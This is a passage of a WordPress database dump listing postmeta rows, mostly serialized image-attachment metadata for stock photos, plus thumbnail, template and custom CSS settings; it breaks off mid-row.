(20649,3291,'_wp_attachment_metadata','a:7:{s:5:\"width\";i:1382;s:6:\"height\";i:550;s:4:\"file\";s:63:\"2022/11/pexels-alphatradezone-5833807-scaled-e1668184706761.jpg\";s:8:\"filesize\";i:330598;s:5:\"sizes\";a:10:{s:6:\"medium\";a:5:{s:4:\"file\";s:63:\"pexels-alphatradezone-5833807-scaled-e1668184706761-300x119.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:119;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8647;}s:5:\"large\";a:5:{s:4:\"file\";s:64:\"pexels-alphatradezone-5833807-scaled-e1668184706761-1024x408.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:408;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:58273;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:63:\"pexels-alphatradezone-5833807-scaled-e1668184706761-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5679;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:63:\"pexels-alphatradezone-5833807-scaled-e1668184706761-768x306.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:306;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:36929;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:43:\"pexels-alphatradezone-5833807-1536x1025.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1025;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:122915;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:43:\"pexels-alphatradezone-5833807-2048x1366.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:1366;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:210031;}s:6:\"awb_sm\";a:5:{s:4:\"file\";s:63:\"pexels-alphatradezone-5833807-scaled-e1668184706761-500x199.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:199;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18814;}s:6:\"awb_md\";a:5:{s:4:\"file\";s:63:\"pexels-alphatradezone-5833807-scaled-e1668184706761-800x318.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:318;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:38935;}s:6:\"awb_lg\";a:5:{s:4:\"file\";s:64:\"pexels-alphatradezone-5833807-scaled-e1668184706761-1280x509.jpg\";s:5:\"width\";i:1280;s:6:\"height\";i:509;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:83503;}s:6:\"awb_xl\";a:5:{s:4:\"file\";s:43:\"pexels-alphatradezone-5833807-1920x1281.jpg\";s:5:\"width\";i:1920;s:6:\"height\";i:1281;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:185370;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}s:14:\"original_image\";s:33:\"pexels-alphatradezone-5833807.jpg\";}'),
(20650,3291,'_wp_attachment_backup_sizes','a:11:{s:9:\"full-orig\";a:3:{s:5:\"width\";i:2560;s:6:\"height\";i:1708;s:4:\"file\";s:40:\"pexels-alphatradezone-5833807-scaled.jpg\";}s:14:\"thumbnail-orig\";a:5:{s:4:\"file\";s:41:\"pexels-alphatradezone-5833807-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4972;}s:11:\"medium-orig\";a:5:{s:4:\"file\";s:41:\"pexels-alphatradezone-5833807-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9963;}s:17:\"medium_large-orig\";a:5:{s:4:\"file\";s:41:\"pexels-alphatradezone-5833807-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:39105;}s:10:\"large-orig\";a:5:{s:4:\"file\";s:42:\"pexels-alphatradezone-5833807-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:61842;}s:14:\"1536x1536-orig\";a:5:{s:4:\"file\";s:43:\"pexels-alphatradezone-5833807-1536x1025.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1025;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:122915;}s:14:\"2048x2048-orig\";a:5:{s:4:\"file\";s:43:\"pexels-alphatradezone-5833807-2048x1366.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:1366;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:210031;}s:11:\"awb_sm-orig\";a:5:{s:4:\"file\";s:41:\"pexels-alphatradezone-5833807-500x334.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:334;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20723;}s:11:\"awb_md-orig\";a:5:{s:4:\"file\";s:41:\"pexels-alphatradezone-5833807-800x534.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:534;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:41887;}s:11:\"awb_lg-orig\";a:5:{s:4:\"file\";s:42:\"pexels-alphatradezone-5833807-1280x854.jpg\";s:5:\"width\";i:1280;s:6:\"height\";i:854;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:89321;}s:11:\"awb_xl-orig\";a:5:{s:4:\"file\";s:43:\"pexels-alphatradezone-5833807-1920x1281.jpg\";s:5:\"width\";i:1920;s:6:\"height\";i:1281;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:185370;}}'),
(20651,2654,'_thumbnail_id','3294'),
(20652,2654,'_wp_page_template','default'),
(20653,2654,'_dt_microsite_primary_menu',''),
(20654,2654,'_dt_microsite_split_left_menu',''),
(20655,2654,'_dt_microsite_split_right_menu',''),
(20656,2654,'_dt_microsite_mobile_menu',''),
(20657,3293,'_wp_attached_file','2022/11/pexels-karolina-grabowska-6328840-scaled.jpg'),
(20658,3293,'_wp_attachment_metadata','a:7:{s:5:\"width\";i:1707;s:6:\"height\";i:2560;s:4:\"file\";s:52:\"2022/11/pexels-karolina-grabowska-6328840-scaled.jpg\";s:8:\"filesize\";i:277558;s:5:\"sizes\";a:10:{s:6:\"medium\";a:5:{s:4:\"file\";s:45:\"pexels-karolina-grabowska-6328840-200x300.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8430;}s:5:\"large\";a:5:{s:4:\"file\";s:46:\"pexels-karolina-grabowska-6328840-683x1024.jpg\";s:5:\"width\";i:683;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:49166;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:45:\"pexels-karolina-grabowska-6328840-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4656;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:46:\"pexels-karolina-grabowska-6328840-768x1152.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1152;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:59114;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:47:\"pexels-karolina-grabowska-6328840-1024x1536.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:97204;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:47:\"pexels-karolina-grabowska-6328840-1365x2048.jpg\";s:5:\"width\";i:1365;s:6:\"height\";i:2048;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:170204;}s:6:\"awb_sm\";a:5:{s:4:\"file\";s:45:\"pexels-karolina-grabowska-6328840-500x750.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:750;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:30542;}s:6:\"awb_md\";a:5:{s:4:\"file\";s:46:\"pexels-karolina-grabowska-6328840-800x1200.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:1200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:63268;}s:6:\"awb_lg\";a:5:{s:4:\"file\";s:47:\"pexels-karolina-grabowska-6328840-1280x1920.jpg\";s:5:\"width\";i:1280;s:6:\"height\";i:1920;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:149706;}s:6:\"awb_xl\";a:5:{s:4:\"file\";s:47:\"pexels-karolina-grabowska-6328840-1920x2880.jpg\";s:5:\"width\";i:1920;s:6:\"height\";i:2880;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:366465;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}s:14:\"original_image\";s:37:\"pexels-karolina-grabowska-6328840.jpg\";}'),
(20659,3294,'_wp_attached_file','2022/11/imd.jpg'),
(20660,3294,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1000;s:6:\"height\";i:571;s:4:\"file\";s:15:\"2022/11/imd.jpg\";s:8:\"filesize\";i:300636;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:15:\"imd-300x171.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:171;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8472;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:15:\"imd-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5531;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:15:\"imd-768x439.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:439;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:33506;}s:6:\"awb_sm\";a:5:{s:4:\"file\";s:15:\"imd-500x286.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:286;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17680;}s:6:\"awb_md\";a:5:{s:4:\"file\";s:15:\"imd-800x457.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:457;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:35590;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(20661,3295,'_wp_attached_file','2022/11/r2.jpg'),
(20662,3295,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1200;s:6:\"height\";i:507;s:4:\"file\";s:14:\"2022/11/r2.jpg\";s:8:\"filesize\";i:267053;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:14:\"r2-300x127.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:127;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5875;}s:5:\"large\";a:5:{s:4:\"file\";s:15:\"r2-1024x433.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:433;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:37069;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:14:\"r2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:3478;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:14:\"r2-768x324.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23456;}s:6:\"awb_sm\";a:5:{s:4:\"file\";s:14:\"r2-500x211.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:211;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:12457;}s:6:\"awb_md\";a:5:{s:4:\"file\";s:14:\"r2-800x338.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:338;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:25107;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(20663,3296,'_wp_attached_file','2022/11/r2-1.jpg'),
(20664,3296,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1200;s:6:\"height\";i:507;s:4:\"file\";s:16:\"2022/11/r2-1.jpg\";s:8:\"filesize\";i:267053;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:16:\"r2-1-300x127.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:127;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5875;}s:5:\"large\";a:5:{s:4:\"file\";s:17:\"r2-1-1024x433.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:433;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:37069;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:16:\"r2-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:3478;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:16:\"r2-1-768x324.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23456;}s:6:\"awb_sm\";a:5:{s:4:\"file\";s:16:\"r2-1-500x211.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:211;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:12457;}s:6:\"awb_md\";a:5:{s:4:\"file\";s:16:\"r2-1-800x338.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:338;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:25107;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(20665,3297,'_wp_attached_file','2022/11/r2-2.jpg'),
(20666,3297,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1200;s:6:\"height\";i:507;s:4:\"file\";s:16:\"2022/11/r2-2.jpg\";s:8:\"filesize\";i:267053;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:16:\"r2-2-300x127.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:127;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5875;}s:5:\"large\";a:5:{s:4:\"file\";s:17:\"r2-2-1024x433.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:433;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:37069;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:16:\"r2-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:3478;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:16:\"r2-2-768x324.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23456;}s:6:\"awb_sm\";a:5:{s:4:\"file\";s:16:\"r2-2-500x211.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:211;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:12457;}s:6:\"awb_md\";a:5:{s:4:\"file\";s:16:\"r2-2-800x338.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:338;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:25107;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(20667,2638,'_thumbnail_id','3297'),
(20668,2669,'_thumbnail_id','3291'),
(20669,2669,'_wp_page_template','default'),
(20670,2669,'_dt_microsite_primary_menu',''),
(20671,2669,'_dt_microsite_split_left_menu',''),
(20672,2669,'_dt_microsite_split_right_menu',''),
(20673,2669,'_dt_microsite_mobile_menu',''),
(20674,3299,'_wp_attached_file','2022/11/pexels-nicole-avagliano-2706654-scaled.jpg'),
(20675,3299,'_wp_attachment_metadata','a:7:{s:5:\"width\";i:2560;s:6:\"height\";i:1707;s:4:\"file\";s:50:\"2022/11/pexels-nicole-avagliano-2706654-scaled.jpg\";s:8:\"filesize\";i:677653;s:5:\"sizes\";a:10:{s:6:\"medium\";a:5:{s:4:\"file\";s:43:\"pexels-nicole-avagliano-2706654-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8864;}s:5:\"large\";a:5:{s:4:\"file\";s:44:\"pexels-nicole-avagliano-2706654-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:112799;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:43:\"pexels-nicole-avagliano-2706654-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:3993;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:43:\"pexels-nicole-avagliano-2706654-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:62824;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:45:\"pexels-nicole-avagliano-2706654-1536x1024.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:248108;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:45:\"pexels-nicole-avagliano-2706654-2048x1365.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:1365;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:433986;}s:6:\"awb_sm\";a:5:{s:4:\"file\";s:43:\"pexels-nicole-avagliano-2706654-500x333.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:333;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:25946;}s:6:\"awb_md\";a:5:{s:4:\"file\";s:43:\"pexels-nicole-avagliano-2706654-800x533.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:533;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:68656;}s:6:\"awb_lg\";a:5:{s:4:\"file\";s:44:\"pexels-nicole-avagliano-2706654-1280x853.jpg\";s:5:\"width\";i:1280;s:6:\"height\";i:853;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:174159;}s:6:\"awb_xl\";a:5:{s:4:\"file\";s:45:\"pexels-nicole-avagliano-2706654-1920x1280.jpg\";s:5:\"width\";i:1920;s:6:\"height\";i:1280;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:380962;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}s:14:\"original_image\";s:35:\"pexels-nicole-avagliano-2706654.jpg\";}'),
(20676,3301,'_wp_attached_file','2022/11/s2.jpg'),
(20677,3301,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1100;s:6:\"height\";i:734;s:4:\"file\";s:14:\"2022/11/s2.jpg\";s:8:\"filesize\";i:684926;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:14:\"s2-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:12596;}s:5:\"large\";a:5:{s:4:\"file\";s:15:\"s2-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:136402;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:14:\"s2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5110;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:14:\"s2-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:84336;}s:6:\"awb_sm\";a:5:{s:4:\"file\";s:14:\"s2-500x334.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:334;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:37571;}s:6:\"awb_md\";a:5:{s:4:\"file\";s:14:\"s2-800x534.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:534;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:90569;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(20678,3302,'_wp_attached_file','2022/11/s2-1.jpg'),
(20679,3302,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1100;s:6:\"height\";i:734;s:4:\"file\";s:16:\"2022/11/s2-1.jpg\";s:8:\"filesize\";i:684926;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:16:\"s2-1-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:12596;}s:5:\"large\";a:5:{s:4:\"file\";s:17:\"s2-1-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:136402;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:16:\"s2-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5110;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:16:\"s2-1-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:84336;}s:6:\"awb_sm\";a:5:{s:4:\"file\";s:16:\"s2-1-500x334.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:334;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:37571;}s:6:\"awb_md\";a:5:{s:4:\"file\";s:16:\"s2-1-800x534.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:534;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:90569;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(20680,2659,'_thumbnail_id','3302'),
(20681,3303,'_wpb_shortcodes_custom_css','.vc_custom_1529515723794{padding-top: 70px !important;padding-bottom: 55px !important;}.vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}.vc_custom_1665815238858{padding-top: 40px !important;padding-bottom: 40px !important;}.vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(20682,3304,'_wp_attached_file','2022/11/pexels-pixabay-71116-scaled.jpg'),
(20683,3304,'_wp_attachment_metadata','a:7:{s:5:\"width\";i:2525;s:6:\"height\";i:2560;s:4:\"file\";s:39:\"2022/11/pexels-pixabay-71116-scaled.jpg\";s:8:\"filesize\";i:718220;s:5:\"sizes\";a:10:{s:6:\"medium\";a:5:{s:4:\"file\";s:32:\"pexels-pixabay-71116-296x300.jpg\";s:5:\"width\";i:296;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16368;}s:5:\"large\";a:5:{s:4:\"file\";s:34:\"pexels-pixabay-71116-1010x1024.jpg\";s:5:\"width\";i:1010;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:137455;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:32:\"pexels-pixabay-71116-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5477;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:32:\"pexels-pixabay-71116-768x779.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:779;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:84856;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:34:\"pexels-pixabay-71116-1515x1536.jpg\";s:5:\"width\";i:1515;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:285933;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:34:\"pexels-pixabay-71116-2020x2048.jpg\";s:5:\"width\";i:2020;s:6:\"height\";i:2048;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:482174;}s:6:\"awb_sm\";a:5:{s:4:\"file\";s:32:\"pexels-pixabay-71116-500x507.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:507;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:40315;}s:6:\"awb_md\";a:5:{s:4:\"file\";s:32:\"pexels-pixabay-71116-800x811.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:811;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:91158;}s:6:\"awb_lg\";a:5:{s:4:\"file\";s:34:\"pexels-pixabay-71116-1280x1298.jpg\";s:5:\"width\";i:1280;s:6:\"height\";i:1298;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:210786;}s:6:\"awb_xl\";a:5:{s:4:\"file\";s:34:\"pe